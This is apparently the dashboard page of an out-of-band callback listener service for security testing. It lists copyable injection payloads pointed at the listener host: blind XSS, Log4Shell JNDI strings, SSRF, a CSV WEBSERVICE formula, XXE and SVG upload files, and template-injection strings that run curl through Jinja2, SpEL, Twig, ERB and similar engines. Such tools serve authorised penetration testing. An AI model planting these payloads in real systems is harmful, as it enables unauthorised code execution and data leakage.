dashboard · cntasrvf.pingback.sh

🙌

● free trial — limited to the first 5 captured hits.

The free trial is designed to help you test the product. Your first 5 hits are fully visible; any additional hits will be captured but their details will remain locked. Email alerts are included on FREE, but captured SMTP sender, recipient, subject and body remain locked. Upgrade to unlock full evidence, all captures and up to 360 days of retention.

Upgrade to Pro →

cntasrvf.pingback.sh

DEMO ONLY DEMO ONLY · created 2026-06-10 12:22 · expires 2028-06-11 · free · 14 days retention

By protocol

HTTP

DNS

XSS

SMTP

total18

last seen22:03:14

⚡ HTTP / HTTPS https://cntasrvf.pingback.sh/ copied

◈ DNS cntasrvf.pingback.sh copied

⚠ Blind XSS "><script src=//cntasrvf.pingback.sh/x></script> copied

✉ SMTP anything@cntasrvf.pingback.sh copied

☠ Log4Shell JNDI ${jndi:ldap://cntasrvf.pingback.sh/a} copied

☠ Log4Shell DNS ${jndi:dns://cntasrvf.pingback.sh/a} copied

↪ SSRF http://cntasrvf.pingback.sh/ssrf copied

▦ CSV injection =WEBSERVICE("https://cntasrvf.pingback.sh/csv") copied

▣ XSS img onerror "><img src=x onerror="…//cntasrvf.pingback.sh/x…"> copied

Click to download — upload to trigger OOB callback

◆ SVG (HTTP callback) payload.svg ↓ download downloading…

◆ SVG + XSS payload-xss.svg ↓ download downloading…

‹› XML (XXE) payload.xml ↓ download downloading…

‹› DTD (XXE OOB) payload.dtd ↓ download downloading…

▤ PDF (SSRF on render) payload.pdf ↓ download downloading…

⧉ HTML (iframe) payload.html ↓ download downloading…

▣ PNG polyglot payload.png ↓ download downloading…

Each payload triggers an HTTP callback to your listener if evaluated

🐍 Jinja2 (Python) {{…popen('curl https://cntasrvf.pingback.sh/j2')…}} copied

☕ SpEL / Spring *{T(Runtime).exec('curl https://cntasrvf.pingback.sh/spel')} copied

🐘 Smarty (PHP) {system('curl https://cntasrvf.pingback.sh/smarty')} copied

☕ Velocity (Java) #set($x=$Runtime.exec('curl https://cntasrvf.pingback.sh/vel')) copied

⊞ Razor (.NET) @(Process.Start('curl','https://cntasrvf.pingback.sh/razor')) copied

☕ FreeMarker (Java) <#assign ex=…>${ex('curl https://cntasrvf.pingback.sh/ftl')} copied

🐘 Twig (PHP) {%set x=…popen('curl https://cntasrvf.pingback.sh/twig')%} copied

💎 ERB (Ruby) <%= `curl https://cntasrvf.pingback.sh/erb` %> copied

Notifications

email — off

discord — off

telegram — off

generic webhook — off

💡 Add an email or webhook to get notified on every hit, even when this tab is closed.

Top source IPs

no hits yet

Top countries

no hits yet

My listeners

loading…

0 selected

⏳

cntasrvf.pingback.sh

Pro feature locked

Listener settings